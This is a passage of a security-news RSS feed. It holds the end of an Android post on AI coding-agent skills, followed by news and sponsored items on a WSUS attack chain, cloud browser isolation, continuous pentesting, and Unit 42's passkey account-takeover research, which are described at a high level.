<p>At a minimum, we test the skill in Android Studio using the latest Gemini Flash model. Depending on the skill, we also ensure compatibility with other models such as Gemini Pro and other agents such as Antigravity, and third-party systems.</p>

<p>All of the evals run with access to the <a href="https://developer.android.com/studio/gemini/access-helpful-resources#android-knowledge-base" target="_blank">Knowledge Base</a>, so if the information is in the documentation, and models decide to search for it, we don't publish a skill for it.</p>

<h2>Using the Android Knowledge Base (Android Studio or Android CLI)</h2>
<p>If you develop Android apps, you should always use the Android Knowledge Base to have access to the official documentation. If you use the agent in Android Studio, it's already available as a tool, but if you use another agent, <a href="https://developer.android.com/tools/agents" target="_blank">install Android CLI</a>. Among other things, it contains the docs command, which gives your agent access to the official Android documentation. Having a single tool is much more efficient than installing hundreds of skills.</p>

<p>If your model is acting overconfident, and you want it to consult the documentation more often, a very common way to motivate it is to add "Always consult the official Android documentation when dealing with Android APIs" to your AGENTS.md file or equivalent. Of course, you can also force this by asking the agent to check the documentation directly in your prompts.</p>

<h2>Why are pull requests disabled?</h2>
<p>Because our evaluation framework depends on internal infrastructure that cannot be open-sourced, we are unable to accept direct pull requests for new skills—without this infrastructure, we would have no way to re-evaluate incoming PR changes. However, we actively monitor community feedback. If you want to report a bug, suggest an optimization, or request a new official skill, please file an <a href="https://github.com/android/skills/issues" target="_blank">issue</a>!</p>

<h2>When do core or basic skills make sense?</h2>
<p>While SOTA models generally don't need basic skills, there are some scenarios where enabling core or community-built skills adds real value. For example:</p>

<ul>
  <li><strong>You're using vague prompts:</strong> Skills amplify your intent. If you give a loose prompt like "add animations to this screen," a specific Compose animation skill can inspire the model, pushing it toward modern APIs or screenshot testing patterns it might not have otherwise considered.</li>
  <li><strong>You want to use smaller, cheaper models:</strong> Frontier LLMs are expensive. If you are offloading routine tasks to smaller open-weight models like Gemma 4, enabling basic skills fills the knowledge gaps that smaller parameters miss.</li>
  <li><strong>You're refactoring or reviewing legacy code:</strong> Models excel at generating code that works, but when editing old codebases, they often prioritize staying consistent with the surrounding legacy patterns over rewriting things with modern accuracy. A specialized reviewer agent equipped with core skills can help break that habit.</li>
  <li><strong>You deviate from the norm:</strong> LLMs love the standard "Google way" of architecting Android apps. If your team uses a highly customized view-layer architecture, the model will struggle to stay aligned. A custom skill explicitly describing your architecture goes a long way.</li>
</ul>

<h2>Where can I find core skills?</h2>
<p>The Android community has your back. Chris Banes has <a href="https://github.com/chrisbanes/skills" target="_blank">a comprehensive collection of skills for Compose and Kotlin</a>, Ivan Morgillo published <a href="https://github.com/hamen/compose_skill" target="_blank">a skill that audits Compose projects</a>, and Jaewoong Eum created two on <a href="https://github.com/skydoves/compose-performance-skills" target="_blank">testing</a> and <a href="https://github.com/skydoves/compose-performance-skills" target="_blank">performance</a>.</p>

<p>Always download skills from reputable sources! I personally wouldn't trust repositories containing dozens or hundreds of Android skills as they're probably AI-generated and untested, and they could even contain malicious or biased instructions. Also, don't install general software engineering skills blindly; a lot of them are tailored for web development.</p>

<h2>Goal: deprecation</h2>
<p>Loosely paraphrasing Karpathy: Skills of today will be in the models of tomorrow. As SOTA models keep improving, we expect skills to be obsolete, especially those built around new APIs. To figure out when to retire them, we run our evals when new models drop. If they pass, we'll keep them around for a few months until most users have transitioned over.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Can Leverage WSUS Servers to Deliver Malware and Compromise Enterprise Endpoints]]></title>
<description><![CDATA[A novel attack chain that allows adversaries to hijack Windows Server Update Services (WSUS), the trusted patch-management architecture widely deployed across enterprise environments. The research, published by SpecterOps researcher Beyviel David, demonstrates how organizations hosting WSUS on an...]]></description>
<link>https://tsecurity.de/de/3708718/it-security-nachrichten/hackers-can-leverage-wsus-servers-to-deliver-malware-and-compromise-enterprise-endpoints/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708718/it-security-nachrichten/hackers-can-leverage-wsus-servers-to-deliver-malware-and-compromise-enterprise-endpoints/</guid>
<pubDate>Thu, 06 Aug 2026 19:08:21 +0200</pubDate>
<content:encoded><![CDATA[<p>A novel attack chain that allows adversaries to hijack Windows Server Update Services (WSUS), the trusted patch-management architecture widely deployed across enterprise environments. The research, published by SpecterOps researcher Beyviel David, demonstrates how organizations hosting WSUS on an external SQL Server database face a critical operational risk: attackers with local network access can coerce authentication, […]</p>
<p>The post <a href="https://cybersecuritynews.com/wsus-servers-leveraged-to-deliver-malware/">Hackers Can Leverage WSUS Servers to Deliver Malware and Compromise Enterprise Endpoints</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise AI requires flexible orchestration over risky model lock-in]]></title>
<description><![CDATA[Stop renting temporary models. Learn why architecture, data ownership, and evaluation are your real advantages.]]></description>
<link>https://tsecurity.de/de/3708609/it-nachrichten/enterprise-ai-requires-flexible-orchestration-over-risky-model-lock-in/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708609/it-nachrichten/enterprise-ai-requires-flexible-orchestration-over-risky-model-lock-in/</guid>
<pubDate>Thu, 06 Aug 2026 19:04:02 +0200</pubDate>
<content:encoded><![CDATA[Stop renting temporary models. Learn why architecture, data ownership, and evaluation are your real advantages.]]></content:encoded>
</item>
<item>
<title><![CDATA[The browser is where attacks land. Why is security still focused on the endpoint?]]></title>
<description><![CDATA[Presented by CloudMosa Enterprise work now happens increasingly inside the browser, and that shift has made the browser a primary point of entry for cyberattacks as well. Browser-based attacks have surged over the past two years, according to industry reports, while Gartner projects that more tha...]]></description>
<link>https://tsecurity.de/de/3708623/it-nachrichten/the-browser-is-where-attacks-land-why-is-security-still-focused-on-the-endpoint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708623/it-nachrichten/the-browser-is-where-attacks-land-why-is-security-still-focused-on-the-endpoint/</guid>
<pubDate>Thu, 06 Aug 2026 19:04:02 +0200</pubDate>
<content:encoded><![CDATA[<p><i>Presented by CloudMosa </i></p><hr><p>Enterprise work now happens increasingly inside the browser, and that shift has made the browser a primary point of entry for cyberattacks as well. Browser-based attacks have surged over the past two years, according to industry reports, while Gartner projects that more than <a href="https://www.paloaltonetworks.com/resources/research/gartner-innovation-insight-secure-enterprise-browsers">85% of enterprise workloads</a> will be accessed through the browser by 2027. </p><p>And yet most enterprise security architecture is still built to protect the device rather than the browser session where that work, and those attacks, actually take place, says Shioupyn Shen, founder and CEO of CloudMosa, the company behind Puffin Cloud Security. </p><p>“CloudMosa originally built its cloud architecture to improve browser performance and accessibility, with the expectation that enterprise work would increasingly move into the browser,” Shen says. “Today’s AI-assisted hacking has validated that architecture, demonstrating that what was designed for performance also provides a strong foundation for modern enterprise security.”</p><h2>The browser as the enterprise's operating environment</h2><p>SaaS platforms, CRM and ERP systems, and collaboration tools have made the browser the primary gateway, and often the central workspace, for enterprise operations. As LLM-powered workflows and autonomous AI agents increasingly operate through that same environment, this shift has also redefined what a threat looks like.</p><p>In a device-centric world, security teams could focus much of their attention on endpoints and networks they could monitor, manage and patch on schedule. But because web code now executes locally on the user’s device, every open browser tab can become a potential entry point for malicious scripts, credential theft, supply chain compromise and other browser-based exploits.</p><p>The browser now interprets and executes remote code, manages authenticated sessions across enterprise applications, and increasingly serves as the execution layer for AI workflows and agents.</p><p>"The browser is no longer just another application running on the endpoint," Shen says. "In practice, it has become the central operating environment for modern enterprise work. Traditional browsers were never designed to carry this level of enterprise responsibility. They were built as local interpreters of remote code, not as enterprise-grade execution environments with strong isolation and policy enforcement."</p><h2>Why detection-first security fails against browser-based attacks</h2><p>Detection-first security has a timing problem: it typically begins only after risky code has reached the device and started executing inside the browser. Because modern browsers execute dynamic, often obfuscated JavaScript and WebAssembly locally, attacks can act on the device before endpoint tools have time to respond. Short-lived or fileless attacks may steal credentials, exfiltrate data or complete their objective before a security team can intervene.</p><p>"It is no longer sufficient to ask only whether a threat can be detected," Shen says. "The stronger approach is to prevent risky or malicious code from ever reaching the device in the first place." </p><h2>AI-generated malware strains signature-based detection</h2><p>AI is a force multiplier that lets attackers automate the creation, mutation and deployment of malware at a scale signature-based tools were never designed to handle. It can generate large volumes of malware variants and help attackers adapt fileless and browser-delivered techniques faster than defenders can analyze them and update signatures.</p><p>That matters because polymorphic malware can alter its code or behavior from one instance to the next, making a known signature less reliable. And when attacks are malware-free — relying instead on legitimate tools, compromised sessions or malicious web content — there may be no conventional file signature to detect at all.</p><p>Enterprises have seen <a href="https://www.crowdstrike.com/en-us/press-releases/2026-crowdstrike-global-threat-report/">an 89% increase in attacks by AI-enabled adversaries</a> over the past year, as increasingly automated and adaptive attacks compress the window available for detection and response.</p><p>"Defenders are no longer just chasing more threats, they are chasing a machine that can keep creating new ones," Shen says. "What was good enough in the past 10 years will not be sufficient in the next six months," he adds.</p><h2>Building architecture that removes the attack surface</h2><p>Rather than continuing to refine detection, the more durable response is to change where web code is allowed to execute in the first place.</p><p>"In a conventional browser, the risk comes to the device," Shen says. "In an isolated cloud model, the risk is kept away from it." </p><p>That principle underlies Puffin Cloud Security. Rather than incrementally improving the browser itself, the platform shifts browser execution into isolated cloud environments. That architectural change improves both performance and security.</p><p>The platform runs the original web session, including its JavaScript, WebAssembly, and other executable payloads, inside a disposable cloud environment and streams only a rendered pixel view to the device. Users keep full interactive control over clicking, typing, and scrolling, but the device itself never parses, executes, or stores the original active code. </p><p>CloudMosa says display rasterization — the layer responsible for the pixel stream — accounts for <a href="https://www.cloudmosa.com/overview">roughly 5% of the browser’s total workload</a>, while the more compute-intensive HTML rendering remains isolated in the cloud. As a result, zero-day exploits and AI-generated polymorphic malware have no executable code to run on the endpoint, while fileless attacks or supply chain compromises within SaaS tools remain contained in the cloud.</p><p>"In CloudMosa's view, that means moving from good-enough security on the device to airtight security in the cloud," Shen says.</p><h2>Fitting browser isolation into SWG, CASB and ZTNA stacks</h2><p>Puffin is designed to extend existing security infrastructure rather than replace it. Secure web gateways, cloud access security broker platforms, and zero trust network access tools remain effective at routing traffic, enforcing policy, and controlling access. But none can fully stop local execution once risky content reaches the browser. </p><p>Puffin closes that gap by routing high-risk sessions through isolated cloud environments and enforcing browser-level policy, whether a user connects over a VPN, a home network, a managed device or an unmanaged, bring-your-own-device setup. </p><p>"Organizations can start with narrow use cases, such as high-risk SaaS access or AI agent workflows, and expand without disrupting tools already in place," Shen says. "The goal is not to undo existing investments, but to make them more complete." </p><h2>The choice between faster detection or endpoint isolation</h2><p>Detection will always have a role in enterprise security, but the more consequential question is no longer how quickly a threat can be caught, but whether attackers can reach the endpoint at all. Recent 2026 surveys found <a href="https://www.darktrace.com/resource/the-state-of-ai-cybersecurity-2026">92% of security professionals</a> are concerned about the impact of AI agents, with <a href="https://www.darkreading.com/threat-intelligence/2026-agentic-ai-attack-surface-poster-child">48% naming agentic AI the top attack vector of the year</a>. Shen noted that agents acting autonomously with user-level privileges are especially exposed to prompt injection, session hijacking, and indirect compromise through compromised web content.</p><p>In designing Puffin Cloud Security, CloudMosa has been “paranoid by design,” meaning it invested in an architecture built for worst-case scenarios and for a threat environment where endpoint security and detection alone may not be enough. </p><p>"This is not just a philosophy, but something that is reflected directly in the architecture itself," Shen says. "CloudMosa built earlier for a harsher threat model than most other organizations did, but today's AI-assisted attacks are now making that posture feel increasingly relevant."</p><p>By dividing a full browser into a very small layer on the device and a much larger layer in the cloud, CloudMosa designed this approach to improve both performance and security at the same time: In Puffin Cloud Security’s architecture, an AI agent’s browser activity takes place inside isolated cloud sandboxes. The endpoint receives only a pixel stream, not the original active code, preventing malicious web content from interacting directly with the device, its credentials or connected systems.</p><p>"AI-assisted hacking represents the kind of structural shift that rewards companies willing to rethink browser from the ground up," Shen says. "And so security leaders now have a choice: redesign for foresight, or wait until hindsight makes the lesson unavoidable."</p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How a global investment firm reduced security surprises]]></title>
<description><![CDATA[Most security teams don’t suffer from a lack of data. They suffer from a lack of certainty.



Vulnerability scanners, annual penetration tests, and compliance assessments can generate thousands of findings. Yet they often fail to answer a simple question: Which risks actually matter?



For a gl...]]></description>
<link>https://tsecurity.de/de/3708375/it-security-nachrichten/how-a-global-investment-firm-reduced-security-surprises/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708375/it-security-nachrichten/how-a-global-investment-firm-reduced-security-surprises/</guid>
<pubDate>Thu, 06 Aug 2026 15:53:44 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Most security teams don’t suffer from a lack of data. They suffer from a lack of certainty.</p>



<p class="wp-block-paragraph">Vulnerability scanners, annual penetration tests, and compliance assessments can generate thousands of findings. Yet they often fail to answer a simple question: Which risks actually matter?</p>



<p class="wp-block-paragraph">For a global investment firm operating across 18 locations, that question became increasingly important. A small security engineering team was responsible for securing a growing environment while balancing infrastructure projects, identity management, user support, and the countless responsibilities that come with protecting a modern enterprise.</p>



<p class="wp-block-paragraph">The team wasn’t struggling to generate findings. They were struggling to understand which findings represented real risk, whether remediation efforts were working, and how to ensure leadership would never be surprised by an exposure that should have been discovered earlier.</p>



<p class="wp-block-paragraph">That journey led them from point-in-time testing to continuous validation.</p>



<h3 class="wp-block-heading">Outcomes at a glance</h3>



<ul class="wp-block-list">
<li>Reduced impacts from 251 to 0 in a same-scope internal penetration test (pentest)</li>



<li>Reduced compromised credentials from 52 to 0</li>



<li>Reduced compromised hosts from 67 to 0</li>



<li>Reduced cracked Active Directory passwords from 40 to 0</li>



<li>Expanded continuous validation across 18 locations using a phased rollout strategy</li>



<li>Enabled a lean security team to continuously validate risk without significant operational overhead</li>
</ul>



<h3 class="wp-block-heading">Impact</h3>



<p class="wp-block-paragraph">The team wasn’t expecting perfection. Every environment contains weaknesses, and no experienced security practitioner assumes an internal pentest will come back clean.</p>



<p class="wp-block-paragraph">What surprised them was how effectively those weaknesses could be chained together once an attacker gained a foothold.</p>



<p class="wp-block-paragraph">One of the firm’s early internal pentests identified 85 weaknesses. By itself, the number wouldn’t have stood out to most security teams. The real concern wasn’t the weaknesses themselves. It was what those weaknesses enabled.</p>



<p class="wp-block-paragraph">NodeZero<sup>®</sup> showed that those weaknesses could produce 251 impacts, including domain compromise, sensitive data exposure, ransomware exposure, host compromise, domain user compromise, and compromised credentials. </p>



<p class="wp-block-paragraph">That distinction matters because attackers don’t exploit weaknesses in isolation. They chain weaknesses, misconfigurations, and credentials together to achieve an objective. A low-priority finding on its own may appear manageable, but when combined with other weaknesses, it can become part of a pathway to something much more serious.</p>



<p class="wp-block-paragraph"><em>Figure 1. An early internal pentest identified 85 weaknesses that led to 251 impacts, including domain compromise, ransomware exposure, sensitive data exposure, and host compromise.</em></p>



<p class="wp-block-paragraph">As the organization’s senior security engineer explained: “That impact section in NodeZero is just pure evidence of what can happen in a real life scenario.”</p>



<p class="wp-block-paragraph">The shift from theoretical risk to demonstrated impact changed how the team approached remediation, shifting the conversation from identifying weaknesses to understanding their potential business impact.</p>



<h3 class="wp-block-heading">Background</h3>



<p class="wp-block-paragraph">Like many organizations, this organization was already investing in security testing. The challenge wasn’t finding another tool. It was finding an <em>approach that could scale across the business </em>without creating additional work for a small security team already balancing infrastructure projects, identity management, user support, and countless other responsibilities.</p>



<p class="wp-block-paragraph">As the senior security engineer described: “NodeZero is, let’s say, 5% of my work. I’m dealing with a million different things, a million different projects, a million different responsibilities.”</p>



<p class="wp-block-paragraph">That reality made operational simplicity more than a convenience. It became a requirement.</p>



<p class="wp-block-paragraph">The team had experience with security testing platforms that required significant infrastructure and ongoing maintenance to keep running effectively. For a small team juggling competing priorities, that overhead mattered. NodeZero offered a different model. The platform was simple to deploy, easy to operate, and allowed the team to begin testing immediately without dedicating resources to managing complex hardware infrastructure.</p>



<p class="wp-block-paragraph">That ease of deployment became particularly important because the team wasn’t interested in running a proof of concept. They wanted to build a sustainable program that could scale with the business.</p>



<p class="wp-block-paragraph">Click <a href="https://horizon3.ai/intelligence/blogs/patch-tuesday-to-pentest-wednesday-reducing-security-surprises/#:~:text=with%20the%20business.-,Mitigation,-Technology%20wasn%E2%80%99t%20the" target="_blank" rel="noreferrer noopener">here</a> to continue reading about the obstacles the organization faced and how they mitigated them.</p>



<h2 class="wp-block-heading">The need to validate outcomes</h2>



<p class="wp-block-paragraph">The objective was never to eliminate every weakness. It was to eliminate uncertainty around the risks that mattered most.</p>



<p class="wp-block-paragraph">That’s the difference between measuring activity and validating outcomes.</p>



<p class="wp-block-paragraph"><a href="https://horizon3.ai/" target="_blank" rel="noreferrer noopener">Learn more about Horizon3.ai and NodeZero.</a></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise passkey security under threat from malware]]></title>
<description><![CDATA[Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.
...]]></description>
<link>https://tsecurity.de/de/3708304/it-security-nachrichten/enterprise-passkey-security-under-threat-from-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708304/it-security-nachrichten/enterprise-passkey-security-under-threat-from-malware/</guid>
<pubDate>Thu, 06 Aug 2026 15:27:38 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.</p>



<p class="wp-block-paragraph">They also pointed out that the issues are not strictly caused by holes in passkeys so much as by weaknesses in the procedures surrounding them. </p>



<p class="wp-block-paragraph">“The researchers didn’t break the underlying cryptography. They exploited the seams around it: onboarding flows, recovery mechanisms and trust signals that weren’t being validated,” said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence. “That distinction matters because it tells us where the actual risk lives.”</p>



<p class="wp-block-paragraph">The <a href="https://unit42.paloaltonetworks.com/passwordless-authentication-security-risks/" target="_blank" rel="noreferrer noopener">Palo Alto report</a> showed attacks that, it said, “demonstrate how malware on a compromised endpoint can misuse onboarding, recovery and device trust workflows to take over passkey-protected accounts,” as well as “how an attacker can authenticate without user interaction, bypass user verification requirements and extract all synced passkey private keys.”</p>



<p class="wp-block-paragraph">Palo Alto described three categories of attack, collectively dubbed Pass-ta-key: Pass-ta-key, where an attacker takes over an account protected by a Google-synced passkey using malware running on the victim’s device, without requiring privilege escalation, device unlock or user interaction; Silver Pass-ta-key, which involves an attacker tricking Google Cloud Authenticator into believing the victim has unlocked the device with biometrics, leading to full account takeover without using the victim’s device during authentication; and Golden Pass-ta-key, which allows an attacker to extract all synced passkeys in a form that lets them be shared or sold on the credential black market.</p>



<p class="wp-block-paragraph">Given the complexity of most global enterprise threat surfaces, <a href="https://www.csoonline.com/article/4085426/your-passwordless-future-may-never-fully-arrive.html" target="_blank">some CISOs have struggled</a> with adapting passwordless processes to environments with legacy and virtual environments. Passcodes have <a href="https://www.csoonline.com/article/4197086/microsoft-is-forcing-an-enterprise-transition-to-passkeys-2.html" target="_blank">been recently embraced</a> by enterprise CISOs as the first step in implementing a passwordless strategy.</p>



<p class="wp-block-paragraph">Analysts and consultants in the main agreed that the flaw Palo Alto reports is significant, despite the fact that it assumes the attacker has already penetrated an environment and successfully installed malware. Sadly, given that such penetration only requires one privileged user anywhere to accidentally click on a poisoned link or attachment, the assumption of prior penetration is likely valid.</p>



<h2 class="wp-block-heading">Implementation issues are the problem</h2>



<p class="wp-block-paragraph">What the report reveals is less about any flaws within passcodes directly, and more about the lack of attention paid to a wide range of mechanisms surrounding them. </p>



<p class="wp-block-paragraph">Greis said CISOs now need to focus on what to do, and what to test, based on the assumption that user behavior is not always as expected. </p>



<p class="wp-block-paragraph">In several cases cited in the report, he pointed out, issues occurred “not because the standard is flawed, but because implementations haven’t caught up to it. It mirrors what we’ve seen repeatedly in security: the specification is sound, but the ecosystem implementing it is uneven.”</p>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, agreed. </p>



<p class="wp-block-paragraph">“On any service where your organization is the relying party, require user verification and actually validate the user-verified flag in the authentication response,” he said. “The researchers found real-world services accepting logins without it, which quietly collapses a multi-factor login back into a single factor.”</p>



<p class="wp-block-paragraph"><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC, added that he would stress to CISOs that this attack assumes a prior successful penetration. </p>



<p class="wp-block-paragraph">“This isn’t passkeys getting hacked from across the internet. It’s what [an attacker] does once they’re already inside the house. So the real headline is that ‘phishing resistant’ stops being resistant the moment the endpoint stops being clean,” he said.</p>



<p class="wp-block-paragraph">“Stop treating verification as optional,” he advised. “Flip it to required, check it server side every single time, and save your hardware bound keys, the YubiKeys of the world, for the accounts that matter most. A key that never leaves a physical device is a key no attacker can ever harvest in bulk.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/orfink/" target="_blank" rel="noreferrer noopener">Or Finkelstein</a>, head of marketing at Secret Double Octopus, agreed that CISOs have gotten complacent about the way in which systems support passkeys.</p>



<p class="wp-block-paragraph">“CISOs should probably look at how user verification is enforced, how enrollment and recovery work, have a clear and enforced policy on whether credentials are synced or device-bound, and have some ITDR system to quickly mitigate suspicious endpoints and authenticators,” he said. “In most serious enterprise environments, EDR and device management reduce the likelihood of initial attacks, but do not close every post-compromise attack path.”</p>



<h2 class="wp-block-heading">Poor support processes weaken passkeys</h2>



<p class="wp-block-paragraph">Some have argued that the lack of sufficiently robust support processes actually weakens passkey capabilities and undermines the whole point of such systems.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/jwgoerlich/" target="_blank" rel="noreferrer noopener">J. Wolfgang Goerlich</a>, a member of the faculty of IANS and a longtime cybersecurity consultant, pointed out that the original FIDO2 spec eliminated credential theft by binding the private key to a physical authenticator. Synced passkeys reintroduced credential portability and therefore reintroduced the form of credential theft risk cited in the Palo Alto report.</p>



<p class="wp-block-paragraph">“A passwordless system is exactly as strong as the flow that re-establishes it,” he said. “Both serious techniques here start by forcing a device to re-enroll. Many security teams have never modeled, never monitored and never rehearsed a response to this.”</p>



<p class="wp-block-paragraph">Goerlich’s advice to CISOs is to require device-bound authenticators, such as hardware tokens or computers, for all privileged and sensitive access. They may consider allowing wallets for lower risk access, he said, “however, much like passwords in Web browsers have long been at risk, we must now consider passkeys in the browsers an unacceptable risk.”</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise passkey security under threat from malware]]></title>
<description><![CDATA[Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.
...]]></description>
<link>https://tsecurity.de/de/3708293/it-nachrichten/enterprise-passkey-security-under-threat-from-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708293/it-nachrichten/enterprise-passkey-security-under-threat-from-malware/</guid>
<pubDate>Thu, 06 Aug 2026 15:22:45 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Given the widespread enterprise adoption of passkeys to replace passwords, a Palo Alto Networks Unit 42 report disclosing ways attackers are getting around passkey protections is concerning, analysts say, but they stress that the demonstrated attacks can only happen after a successful intrusion.</p>



<p class="wp-block-paragraph">They also pointed out that the issues are not strictly caused by holes in passkeys so much as by weaknesses in the procedures surrounding them. </p>



<p class="wp-block-paragraph">“The researchers didn’t break the underlying cryptography. They exploited the seams around it: onboarding flows, recovery mechanisms and trust signals that weren’t being validated,” said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence. “That distinction matters because it tells us where the actual risk lives.”</p>



<p class="wp-block-paragraph">The <a href="https://unit42.paloaltonetworks.com/passwordless-authentication-security-risks/" target="_blank" rel="noreferrer noopener">Palo Alto report</a> showed attacks that, it said, “demonstrate how malware on a compromised endpoint can misuse onboarding, recovery and device trust workflows to take over passkey-protected accounts,” as well as “how an attacker can authenticate without user interaction, bypass user verification requirements and extract all synced passkey private keys.”</p>



<p class="wp-block-paragraph">Palo Alto described three categories of attack, collectively dubbed Pass-ta-key: Pass-ta-key, where an attacker takes over an account protected by a Google-synced passkey using malware running on the victim’s device, without requiring privilege escalation, device unlock or user interaction; Silver Pass-ta-key, which involves an attacker tricking Google Cloud Authenticator into believing the victim has unlocked the device with biometrics, leading to full account takeover without using the victim’s device during authentication; and Golden Pass-ta-key, which allows an attacker to extract all synced passkeys in a form that lets them be shared or sold on the credential black market.</p>



<p class="wp-block-paragraph">Given the complexity of most global enterprise threat surfaces, <a href="https://www.csoonline.com/article/4085426/your-passwordless-future-may-never-fully-arrive.html" target="_blank">some CISOs have struggled</a> with adapting passwordless processes to environments with legacy and virtual environments. Passcodes have <a href="https://www.csoonline.com/article/4197086/microsoft-is-forcing-an-enterprise-transition-to-passkeys-2.html" target="_blank">been recently embraced</a> by enterprise CISOs as the first step in implementing a passwordless strategy.</p>



<p class="wp-block-paragraph">Analysts and consultants in the main agreed that the flaw Palo Alto reports is significant, despite the fact that it assumes the attacker has already penetrated an environment and successfully installed malware. Sadly, given that such penetration only requires one privileged user anywhere to accidentally click on a poisoned link or attachment, the assumption of prior penetration is likely valid.</p>



<h2 class="wp-block-heading">Implementation issues are the problem</h2>



<p class="wp-block-paragraph">What the report reveals is less about any flaws within passcodes directly, and more about the lack of attention paid to a wide range of mechanisms surrounding them. </p>



<p class="wp-block-paragraph">Greis said CISOs now need to focus on what to do, and what to test, based on the assumption that user behavior is not always as expected. </p>



<p class="wp-block-paragraph">In several cases cited in the report, he pointed out, issues occurred “not because the standard is flawed, but because implementations haven’t caught up to it. It mirrors what we’ve seen repeatedly in security: the specification is sound, but the ecosystem implementing it is uneven.”</p>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, agreed. </p>



<p class="wp-block-paragraph">“On any service where your organization is the relying party, require user verification and actually validate the user-verified flag in the authentication response,” he said. “The researchers found real-world services accepting logins without it, which quietly collapses a multi-factor login back into a single factor.”</p>



<p class="wp-block-paragraph"><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC, added that he would stress to CISOs that this attack assumes a prior successful penetration. </p>



<p class="wp-block-paragraph">“This isn’t passkeys getting hacked from across the internet. It’s what [an attacker] does once they’re already inside the house. So the real headline is that ‘phishing resistant’ stops being resistant the moment the endpoint stops being clean,” he said.</p>



<p class="wp-block-paragraph">“Stop treating verification as optional,” he advised. “Flip it to required, check it server side every single time, and save your hardware bound keys, the YubiKeys of the world, for the accounts that matter most. A key that never leaves a physical device is a key no attacker can ever harvest in bulk.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/orfink/" target="_blank" rel="noreferrer noopener">Or Finkelstein</a>, head of marketing at Secret Double Octopus, agreed that CISOs have gotten complacent about the way in which systems support passkeys.</p>



<p class="wp-block-paragraph">“CISOs should probably look at how user verification is enforced, how enrollment and recovery work, have a clear and enforced policy on whether credentials are synced or device-bound, and have some ITDR system to quickly mitigate suspicious endpoints and authenticators,” he said. “In most serious enterprise environments, EDR and device management reduce the likelihood of initial attacks, but do not close every post-compromise attack path.”</p>



<h2 class="wp-block-heading">Poor support processes weaken passkeys</h2>



<p class="wp-block-paragraph">Some have argued that the lack of sufficiently robust support processes actually weakens passkey capabilities and undermines the whole point of such systems.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/jwgoerlich/" target="_blank" rel="noreferrer noopener">J. Wolfgang Goerlich</a>, a member of the faculty of IANS and a longtime cybersecurity consultant, pointed out that the original FIDO2 spec eliminated credential theft by binding the private key to a physical authenticator. Synced passkeys reintroduced credential portability and therefore reintroduced the form of credential theft risk cited in the Palo Alto report.</p>



<p class="wp-block-paragraph">“A passwordless system is exactly as strong as the flow that re-establishes it,” he said. “Both serious techniques here start by forcing a device to re-enroll. Many security teams have never modeled, never monitored and never rehearsed a response to this.”</p>



<p class="wp-block-paragraph">Goerlich’s advice to CISOs is to require device-bound authenticators, such as hardware tokens or computers, for all privileged and sensitive access. They may consider allowing wallets for lower risk access, he said, “however, much like passwords in Web browsers have long been at risk, we must now consider passkeys in the browsers an unacceptable risk.”</p>



<p class="wp-block-paragraph">This article originally appeared on <a href="https://www.csoonline.com/article/4205751/report-passkey-security-issues-could-allow-account-takeover.html" target="_blank">CSOonline</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[You’re only as secure as your last evaluation]]></title>
